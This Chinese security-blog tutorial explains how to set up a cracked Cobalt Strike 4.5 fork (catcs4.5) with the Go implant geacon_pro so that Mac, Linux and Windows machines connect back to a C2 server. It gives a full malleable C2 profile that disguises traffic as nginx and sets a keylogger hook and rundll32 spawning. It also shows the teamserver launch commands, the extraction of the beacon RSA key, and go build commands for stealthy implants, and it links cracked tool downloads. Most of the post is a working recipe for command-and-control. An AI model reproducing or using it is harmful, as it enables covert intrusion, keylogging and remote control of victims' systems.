官方公众号企业安全新浪微博
FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。
FreeBuf+小程序
geacon_pro配合catcs4.5上线Mac、Linux
xzajyjs- 关注
geacon_pro配合catcs4.5上线Mac、Linux
我的个人博客: xzajyjs.cn
一些链接
Try师傅的catcs4.5项目: https://github.com/TryGOTry/CobaltStrike_Cat_4.5,最新版解压密码见:https://www.nctry.com/2708.html
geacon_pro: https://github.com/testxxxzzz/geacon_pro
BeaconTool.jar: https://xzajyjs.lanzouc.com/i76gk15ncw0j,密码:0*rL~F8<Mq
catcs4.5部署
修改server端和client端的properties,保持一致。
这里使用默认的geacon_profile进行测试,上传到server端,保存为geacon.profile:
set sleeptime "3000";
https-certificate {
set C "KZ";
set CN "foren.zik";
set O "NN Fern Sub";
set OU "NN Fern";
set ST "KZ";
set validity "365";
}
http-get {
set uri "/www/handle/doc";
client {
metadata {
base64url;
prepend "SESSIONID=";
header "Cookie";
}
}
server {
header "Server" "nginx/1.10.3 (Ubuntu)";
header "Content-Type" "application/octet-stream";
header "Connection" "keep-alive";
header "Vary" "Accept";
header "Pragma" "public";
header "Expires" "0";
header "Cache-Control" "must-revalidate, post-check=0, pre-check=0";
output {
mask;
netbios;
prepend "data=";
append "%%";
print;
}
}
}
http-post {
set uri "/IMXo";
client {
id {
mask;
netbiosu;
parameter "doc";
}
output {
mask;
base64url;
prepend "data=";
append "%%";
print;
}
}
server {
header "Server" "nginx/1.10.3 (Ubuntu)";
header "Content-Type" "application/octet-stream";
header "Connection" "keep-alive";
header "Vary" "Accept";
header "Pragma" "public";
header "Expires" "0";
header "Cache-Control" "must-revalidate, post-check=0, pre-check=0";
output {
mask;
netbios;
prepend "data=";
append "%%";
print;
}
}
}
post-ex {
set spawnto_x86 "c:\\windows\\syswow64\\rundll32.exe";
set spawnto_x64 "c:\\windows\\system32\\rundll32.exe";
set thread_hint "ntdll.dll!RtlUserThreadStart+0x1000";
set pipename "DserNamePipe##, PGMessagePipe##, MsFteWds##";
set keylogger "SetWindowsHookEx";
}
然后修改CatServer.properties中的参数CatServer.profile为我们生成的profile文件
CatServer.profile = geacon.profile
运行服务端
chmod +x teamserver TeamServer.prop
sudo ./teamserver
客户端连接
接下来生成一个监听器listener,主要要使用https,如果是http需要将geacon_pro的config.go中sslHTTP改成"http://"
生成geacon_pro
git clone https://github.com/testxxxzzz/geacon_pro.git
cd geacon_pro
如果使用readme中默认的profile的话config.go中有两处需要修改,
获取RsaPublicKey
使用BeaconTool工具,读取server端的隐藏文件.cobaltstrike.beacon_keys
java -jar BeaconTool.jar -i .cobaltstrike.beacon_keys -rsa
复制其中的PUBLIC KEY至config中对应位置,修改C2地址为监听器的url
go编译生成geacon,例如:
# arm mac
export GOOS="darwin" && export GOARCH="arm64" && go build -ldflags "-s -w" main.go
# x86 windows
export GOOS="windows" && export GOARCH="amd64" && go build -ldflags "-H windowsgui -s -w" main.go
观察到上线成功
免责声明
1.一般免责声明:本文所提供的技术信息仅供参考,不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》,作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。
2. 适用性声明:文中技术内容可能不适用于所有情况或系统,在实际应用前请充分测试和评估。若因使用不当造成的任何问题,相关方不承担责任。
3. 更新声明:技术发展迅速,文章内容可能存在滞后性。读者需自行判断信息的时效性,因依据过时内容产生的后果,作者及发布平台不承担责任。
本文为 xzajyjs 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
xzajyjs LV.5
这家伙太懒了,还未填写个人描述!
- 16 文章数
- 8 关注者
CodeQL学习笔记(5)-CodeQL for Java(AST、元数据、调用图)
2024-11-05
CodeQL学习笔记(4)-CodeQL for Java(程序元素)
2024-11-04
CodeQL学习笔记(3)-QL语法(模块、变量、表达式、公式和注解)
2024-10-29
文章目录